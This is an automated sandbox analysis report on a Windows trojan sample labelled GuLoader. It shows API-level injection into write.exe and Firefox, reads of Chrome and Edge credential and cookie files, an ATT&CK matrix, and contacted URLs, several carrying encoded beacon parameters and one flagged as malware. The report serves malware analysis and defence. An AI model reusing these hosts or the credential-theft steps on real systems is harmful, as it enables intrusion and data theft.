        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3252174A mov eax, dword ptr fs:[00000030h]9_2_3252174A
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32520774 mov eax, dword ptr fs:[00000030h]9_2_32520774
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32502760 mov ecx, dword ptr fs:[00000030h]9_2_32502760
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32531763 mov eax, dword ptr fs:[00000030h]9_2_32531763
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4779 mov eax, dword ptr fs:[00000030h]9_2_324F4779
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F4779 mov eax, dword ptr fs:[00000030h]9_2_324F4779
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB705 mov eax, dword ptr fs:[00000030h]9_2_324EB705
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB705 mov eax, dword ptr fs:[00000030h]9_2_324EB705
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB705 mov eax, dword ptr fs:[00000030h]9_2_324EB705
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324EB705 mov eax, dword ptr fs:[00000030h]9_2_324EB705
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF717 mov eax, dword ptr fs:[00000030h]9_2_325AF717
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324FD700 mov ecx, dword ptr fs:[00000030h]9_2_324FD700
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B970B mov eax, dword ptr fs:[00000030h]9_2_325B970B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325B970B mov eax, dword ptr fs:[00000030h]9_2_325B970B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F471B mov eax, dword ptr fs:[00000030h]9_2_324F471B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F471B mov eax, dword ptr fs:[00000030h]9_2_324F471B
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251270D mov eax, dword ptr fs:[00000030h]9_2_3251270D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251270D mov eax, dword ptr fs:[00000030h]9_2_3251270D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251270D mov eax, dword ptr fs:[00000030h]9_2_3251270D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32519723 mov eax, dword ptr fs:[00000030h]9_2_32519723
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_325AF7CF mov eax, dword ptr fs:[00000030h]9_2_325AF7CF
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F37E4 mov eax, dword ptr fs:[00000030h]9_2_324F37E4
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3251E7E0 mov eax, dword ptr fs:[00000030h]9_2_3251E7E0
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F77F9 mov eax, dword ptr fs:[00000030h]9_2_324F77F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_324F77F9 mov eax, dword ptr fs:[00000030h]9_2_324F77F9
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32521796 mov eax, dword ptr fs:[00000030h]9_2_32521796
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_32521796 mov eax, dword ptr fs:[00000030h]9_2_32521796
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D
        Source: C:\Users\user\Desktop\Nondesistance.exeCode function: 9_2_3256E79D mov eax, dword ptr fs:[00000030h]9_2_3256E79D

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtReadFile: Direct from: 0x77A929FC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtQuerySystemInformation: Direct from: 0x77A92D1C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtProtectVirtualMemory: Direct from: 0x77A87A4E
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtMapViewOfSection: Direct from: 0x77A92C3C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtWriteVirtualMemory: Direct from: 0x77A92D5C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtResumeThread: Direct from: 0x77A935CC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtAllocateVirtualMemory: Direct from: 0x77A92B1C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtSetInformationProcess: Direct from: 0x77A92B7C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtNotifyChangeKey: Direct from: 0x77A93B4C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtReadVirtualMemory: Direct from: 0x77A92DAC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtAllocateVirtualMemory: Direct from: 0x77A93BBC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtQueryInformationToken: Direct from: 0x77A92BCC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtOpenFile: Direct from: 0x77A92CEC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtCreateFile: Direct from: 0x77A92F0C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtAllocateVirtualMemory: Direct from: 0x77A92B0C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtOpenSection: Direct from: 0x77A92D2C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtQueryVolumeInformationFile: Direct from: 0x77A92E4C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtDeviceIoControlFile: Direct from: 0x77A92A0C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtQuerySystemInformation: Direct from: 0x77A947EC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtQueryAttributesFile: Direct from: 0x77A92D8C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtSetInformationThread: Direct from: 0x77A92A6C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtSetInformationThread: Direct from: 0x77A86319
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtCreateKey: Direct from: 0x77A92B8C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtClose: Direct from: 0x77A92A8C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtAllocateVirtualMemory: Direct from: 0x77A9480C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtProtectVirtualMemory: Direct from: 0x77A92EBC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtWriteVirtualMemory: Direct from: 0x77A9482C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtOpenKeyEx: Direct from: 0x77A92ABC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtCreateUserProcess: Direct from: 0x77A9363C
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtQueryInformationProcess: Direct from: 0x77A92B46
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtResumeThread: Direct from: 0x77A92EDC
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe NtDelayExecution: Direct from: 0x77A92CFC
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Nondesistance.exe Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: read write
        Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\write.exe Thread register set: target process: 7336
        Source: C:\Users\user\Desktop\Nondesistance.exe Process created: C:\Users\user\Desktop\Nondesistance.exe "C:\Users\user\Desktop\Nondesistance.exe"
        Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
        Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager&
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000000.20314711181.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp, jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033525325.0000000000FF0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\Nondesistance.exe Code function: 4_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA

        Stealing of Sensitive Information

        Source: Yara match File source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\write.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match File source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 11 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 212 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 212 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 4 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

        [Behavior Graph ID: 1447915. Sample: Nondesistance.exe. Startdate: 27/05/2024. Architecture: WINDOWS. Score: 100. Process chain: Nondesistance.exe (started) -> Nondesistance.exe (started) -> jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe (injected) -> write.exe (started) -> firefox.exe (started).]

        Source | Detection | Scanner | Label | Link
        Nondesistance.exe | 50% | ReversingLabs | Win32.Trojan.GuLoader |
        Nondesistance.exe | 57% | Virustotal | | Browse
        Nondesistance.exe | 100% | Avira | HEUR/AGEN.1331786 |
        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll | 0% | ReversingLabs | |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        https://www.iv.lt/talpinimo-planai/0%Avira URL Cloudsafe
        https://whois.gandi.net/en/results?search=avocatmh.org0%Avira URL Cloudsafe
        https://img.sedoparking.com/templates/bg/NameSiloLogo.png0%Avira URL Cloudsafe
        http://www.maxiwalls.com/udud/0%Avira URL Cloudsafe
        http://www.noispisok.com/udud/0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.maxiwalls.com/udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        https://drive.usercontent.google.com/0%Avira URL Cloudsafe
        https://drive.google.com/Hd0%Avira URL Cloudsafe
        https://www.iv.lt/neribotas-svetainiu-talpinimas/0%Avira URL Cloudsafe
        https://www.iv.lt/el-pasto-filtras/0%Avira URL Cloudsafe
        https://www.iv.lt/svetainiu-kurimo-irankis/0%Avira URL Cloudsafe
        http://www.l7aeh.us/udud/0%Avira URL Cloudsafe
        https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
        https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
        http://www.osbornesargent.co.uk0%Avira URL Cloudsafe
        http://www.grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0LvbcUe5EAajqxEazp9el6mHCoSAKD4KRQ5UefbhtvnOrVvch9BM72k+FCmqI=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        http://www.donantedeovulos.space/udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG100%Avira URL Cloudmalware
        https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
        http://www.l7aeh.us/udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        http://www.funtechie.top/udud/0%Avira URL Cloudsafe
        https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e9570%Avira URL Cloudsafe
        http://www.fivetownsjcc.com/udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG0%Avira URL Cloudsafe
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://assets.iv.lt/footer.htmljbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://tilda.ccjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://login.liwrite.exe, 0000000B.00000002.25029531563.0000000002A4B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://d1di2lzuh97fh2.cloudfront.netjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.iv.lt/jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://tilda.ws/img/logo404.pngjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.gandi.net/en/domainjbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000072C8000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000064C8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://nsis.sf.net/NSIS_ErrorErrorNondesistance.exefalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
